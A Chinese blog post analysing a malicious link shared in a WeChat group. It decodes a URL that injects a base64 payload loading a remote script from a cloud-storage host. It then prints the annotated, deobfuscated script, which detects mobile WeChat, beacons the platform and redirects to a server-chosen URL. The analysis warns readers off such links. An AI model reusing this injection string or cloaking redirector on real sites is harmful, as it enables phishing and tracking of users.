群里的一个恶意链接分析过程
群里有这样一个链接,因为是防疫群是不可能邀请大家参加婚礼的。
于是乎好奇的点击了,然而浏览器并没有反应。
复制了链接发现是这样一个奇怪的地址
https://xxxx.com/mall/index.html?click_type=768123%27;setTimeout(atob(%27dmFyIHNzID0gZG9jdW1lbnQxY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7IHNzLnNyYyA9ICIvL3F3ZTEyMzMyMS5vc3MtY24tYmVpamluZy5hbGl5dW5jcy5jb20vanMvbXNnMjEuanMiOyBkb2N1bWVudC5kb2N1bWVudEVsZW1lbnQuYXBwZW5kQ2hpbGQoc3MpOw==%27)%2c1);//
%27 转码后是 '
%2c1 转码后 ,1
setTimeout( ) 一秒后执行
atob( ) : base64 解码函数
解密后是一个 js 地址:http://xxxxxx.oss-cn-beijing.aliyuncs.com/js/msg21.js
打开发现是一个加密的JS
因为是 V5 js 加密的,这块没有接触过。JS 的内容无法知道,但作者既然不想让人看到,代码里面肯定没有干好事。至于是不是盗号、推广还是广告,就不得而知。
如此一来: 陌生链接,具有诱惑性的链接,不要点
当然这种包含恶意内容的链接,平台也会很快屏蔽。
以后有机会可以研究一下js解密。
更新一下
__________________________________________
解密后的JS
// Deobfuscated payload exactly as posted on the page (only reformatted and annotated).
// What the code below does, read from the code itself: it fingerprints the browser and,
// only inside the WeChat in-app browser (version >= 7, platform not starting with
// "Win"/"Mac"), fetches a base64-encoded URL from a remote endpoint and navigates to it
// through a synthetic <a rel="noreferrer"> click. Every other visitor only triggers a
// POST beacon carrying navigator.platform and a no-op navigation to '#'. That split
// is consistent with a cloaking/redirect pattern: desktop analysts see nothing.
(function () {
  // Obfuscator lookup table: string constants plus trivial proxy functions that stand in
  // for operators and calls (fKPML is `a + b`, NImgf is `a === b`, pkwUU is `f(x)`, ...).
  var _0xaeeadd = {
    'fKPML': function _0x14f0f0(_0x5c3713, _0x1a63d4) {
      return _0x5c3713 + _0x1a63d4;
    },
    'QCLsm': '(^|&)',
    'KhmkX': '=([^&]*)(&|$)',
    'pkwUU': function _0x32d898(_0xc21c09, _0x5cb8e1) {
      return _0xc21c09(_0x5cb8e1);
    },
    'NImgf': function _0x33b8ae(_0x482fe5, _0x29be10) {
      return _0x482fe5 === _0x29be10;
    },
    'MnKMf': 'Win',
    'FNPcq': 'Mac',
    'MiFij': function _0x354ab1(_0x1c1e1b, _0x1383fa) {
      return _0x1c1e1b && _0x1383fa;
    },
    'xlxNW': 'uYi',
    'HlNCM': function _0xb671d6(_0x5415a8) {
      return _0x5415a8();
    },
    'xbyII': function _0x430a35(_0x4d7c9d, _0x138736) {
      return _0x4d7c9d < _0x138736;
    },
    'PggWd': 'POST',
    'pmkHt': 'Content-Type',
    'DqzsN': 'application/x-www-form-urlencoded',
    'VfEeh': 'rel',
    'VjhJK': 'noreferrer',
    'CPxCm': 'href',
    'dsBeQ': 'type',
    'FVmgL': function _0x1ec231(_0x598e3f, _0x42ad76) {
      return _0x598e3f(_0x42ad76);
    },
    'swpDV': 'sid',
    'DIwHW': 'aid',
    'fSiTS': function _0x3f03f3(_0x2009ea, _0x990f9) {
      return _0x2009ea(_0x990f9);
    },
    // Endpoint that returns the (base64-encoded) redirect target; host anonymised on the page.
    'iKdOU': 'https://xxxx/zhuanfa/index/getUrl4',
    // Beacon host; anonymised on the page.
    'iijAp': 'https://www.xxx.xx',
    'SRGif': function _0x5aeb01(_0x3cabc9) {
      return _0x3cabc9();
    },
    'OyAtk': function _0x3c3206(_0x2d909a) {
      return _0x2d909a();
    },
    'EysgW': 'dev',
    'WtgwP': '【开发模式】',
    'RECbh': function _0x54cbc9(_0x2eebf6) {
      return _0x2eebf6();
    },
    'IWljf': 'vvT',
    'EAyvE': function _0x26768c(_0x4b9384) {
      return _0x4b9384();
    },
    'MBeJk': function _0x695c5e(_0x5e669c) {
      return _0x5e669c();
    }
  };

  // Query-string reader: builds /(^|&)<name>=([^&]*)(&|$)/i, matches it against
  // location.search without the leading '?', and returns unescape(value) or null.
  // With the default argument (null) the regex looks for a literal "null=" parameter.
  function _0x3aae30(_0x542f79 = null) {
    var _0x529546 = new RegExp(_0xaeeadd['fKPML'](_0xaeeadd['QCLsm'], _0x542f79) + _0xaeeadd['KhmkX'], 'i');
    var _0x31b98d = window['location']['search']['substr'](0x1)['match'](_0x529546);
    if (_0x31b98d != null) return _0xaeeadd['pkwUU'](unescape, _0x31b98d[0x2]);
    return null;
  }

  // Environment check #1: true only when the lower-cased user agent contains
  // "micromessenger" (WeChat in-app browser) AND navigator.platform starts with neither
  // "Win" nor "Mac" — i.e. WeChat on a mobile device. 'FTI' !== 'uYi' is always true, so
  // the innermost else branch is unreachable obfuscator filler.
  function _0x12824a() {
    const _0x162822 = navigator['platform'];
    const _0x175089 = _0xaeeadd['NImgf'](_0x162822['indexOf'](_0xaeeadd['MnKMf']), 0x0);
    const _0xae94b8 = _0x162822['indexOf'](_0xaeeadd['FNPcq']) === 0x0;
    const _0x3dcc2c = /micromessenger/ ['test'](navigator['userAgent']['toLowerCase']());
    if (_0xaeeadd['MiFij'](_0x3dcc2c, !_0x175089) && !_0xae94b8) {
      return !![];
    } else {
      if ('FTI' !== _0xaeeadd['xlxNW']) {
        return ![];
      } else {
        _0xaeeadd['HlNCM'](_0x72f538);
        _0xaeeadd['pkwUU'](_0x191d64, '#');
      }
    }
  }

  // Environment check #2: collects the digits/dots that follow "micromessenger/" in the
  // user agent (0xf = 15 = length of "micromessenger/"), parseFloat()s them and returns
  // true when the WeChat version is >= 7.
  function _0x775b3a() {
    const _0x4f64dc = navigator['userAgent']['toLowerCase']();
    const _0x1860d3 = /micromessenger/;
    let _0x53b8bc = ![];
    if (_0x1860d3['test'](_0x4f64dc)) {
      const _0x1b8303 = _0x4f64dc['search'](_0x1860d3);
      let _0x244c59 = '';
      for (let _0xa894d5 = _0x1b8303 + 0xf; _0xaeeadd['xbyII'](_0xa894d5, _0x4f64dc['length']); _0xa894d5++) {
        const _0x55e4d3 = _0x4f64dc[_0xa894d5];
        if (/^\d{1,}$/ ['test'](_0x55e4d3) || _0xaeeadd['NImgf'](_0x55e4d3, '.')) {
          _0x244c59 += _0x55e4d3;
        } else {
          break;
        }
      }
      _0x244c59 = parseFloat(_0x244c59);
      if (_0x244c59 >= 0x7) _0x53b8bc = !![];
    }
    return _0x53b8bc;
  }
  // Beacon host (see 'iijAp' above).
  var _0x320916 = _0xaeeadd['iijAp'];

  // Beacon: POST "platform=<navigator.platform>" (form-urlencoded) to
  // <host>/<random id>.xml. The random path segment makes every hit unique; a POST to a
  // *.xml path whose body is only `platform=` is a usable proxy/web-log detection signal.
  function _0x72f538() {
    var _0x31ca84 = new XMLHttpRequest();
    _0x31ca84['open'](_0xaeeadd['PggWd'], _0x320916 + '/' + _0x1f1b99 + '.xml', !![]);
    _0x31ca84['setRequestHeader'](_0xaeeadd['pmkHt'], _0xaeeadd['DqzsN']);
    _0x31ca84['send']('platform=' + navigator['platform']);
  }

  // Navigation helper: creates <a rel="noreferrer" href=url>, appends it to document.body
  // and synthetically clicks it. rel="noreferrer" tells the browser to omit the Referer
  // header, so the destination cannot see the page the victim came from.
  function _0x191d64(_0x2d7909) {
    const _0xe8c4a5 = document['createElement']('a');
    _0xe8c4a5['setAttribute'](_0xaeeadd['VfEeh'], _0xaeeadd['VjhJK']);
    _0xe8c4a5['setAttribute'](_0xaeeadd['CPxCm'], _0x2d7909);
    document['body']['appendChild'](_0xe8c4a5);
    _0xe8c4a5['click']();
  }

  // Redirect stage: reads ?type=, ?sid= and ?aid= (the assembled "?type=..&aid=.." string
  // and sid are never used afterwards — leftover code), GETs the remote endpoint,
  // base64-decodes the response body and navigates to it. The final destination is thus
  // chosen server-side at run time and is not present anywhere in this script.
  function _0x5ee876() {
    const _0x507d4c = _0x3aae30(_0xaeeadd['dsBeQ']);
    const _0x52e6be = _0xaeeadd['FVmgL'](_0x3aae30, _0xaeeadd['swpDV']);
    const _0x3b61df = _0x3aae30(_0xaeeadd['DIwHW']);
    let _0x2b07b8 = '';
    if (_0x507d4c) {
      _0x2b07b8 = '?type=' + _0x507d4c + '&aid=' + _0x3b61df;
    }
    _0xaeeadd['fSiTS'](fetch, _0xaeeadd['iKdOU'])['then'](_0x2f8c1a => _0x2f8c1a['text']())['then'](_0x147f1f =>
      _0x191d64(atob(_0x147f1f)));
  }
  // Per-page-load random identifier (base-36 fraction of Math.random()) used as the beacon path.
  const _0x1f1b99 = Math['random']()['toString'](0x24)['substr'](0x2);
  // Dispatch. Visitors that are NOT mobile WeChat >= 7 only send the beacon and "navigate"
  // to '#' (a no-op), unless the dev switch fires; mobile WeChat >= 7 users are redirected.
  // 'vvT' === 'Cgo' is always false, so the logging branch below never runs.
  if (!_0x12824a() || !_0xaeeadd['SRGif'](_0x775b3a)) {
    // _0x3aae30() with no argument yields a string or null, and a string has no 'dev'
    // property — NOTE(review): this looks like a disabled dev-mode switch; unverified.
    const _0xa26fef = _0xaeeadd['OyAtk'](_0x3aae30);
    if (_0xa26fef && _0xa26fef[_0xaeeadd['EysgW']]) {
      console['log'](_0xaeeadd['WtgwP']);
      _0xaeeadd['OyAtk'](_0x5ee876);
    } else {
      _0xaeeadd['RECbh'](_0x72f538);
      _0x191d64('#');
    }
  } else {
    if (_0xaeeadd['NImgf'](_0xaeeadd['IWljf'], 'Cgo')) {
      console['log'](_0xaeeadd['WtgwP']);
      _0xaeeadd['EAyvE'](_0x5ee876);
    } else {
      _0xaeeadd['MBeJk'](_0x5ee876);
    }
  }
}());;
// Obfuscator watermark (jsjiami.com v5), not part of the payload: if the global
// `encode_version` is missing or differs from 'jsjiami.com.v5', window.alert() is shown.
// The string 'jsjiami.com.v5' is a handy fingerprint of the obfuscation tool.
(function (_0xe5cddc, _0xb8de6b, _0x4ff679) {
  var _0x1b14d7 = {
    'Kyljy': 'undefined',
    'syTvc': 'jsjiami.com.v5',
    'GkGtd': '删除版本号,js会定期弹窗'
  };
  _0x4ff679 = 'al';
  try {
    _0x4ff679 += 'ert'; // assembles the string 'alert' so window['alert'] is not visible as a literal
    _0xb8de6b = encode_version;
    if (!(typeof _0xb8de6b !== _0x1b14d7['Kyljy'] && _0xb8de6b === _0x1b14d7['syTvc'])) {
      _0xe5cddc[_0x4ff679]('删除' + '版本号,js会定期弹窗,还请支持我们的工作');
    }
  } catch (_0x3249a0) {
    _0xe5cddc[_0x4ff679](_0x1b14d7['GkGtd']);
  }
}(window));;
// Global expected by the watermark check above.
encode_version = 'jsjiami.com.v5'
这个 js 后面对应有一个 TP 后台,对应的有非常多的域名,至于域名下这个后台是收集什么信息的就不扒了。水平有限。
文章来源:刘俊涛的博客欢迎关注公众号、留言、评论,一起学习。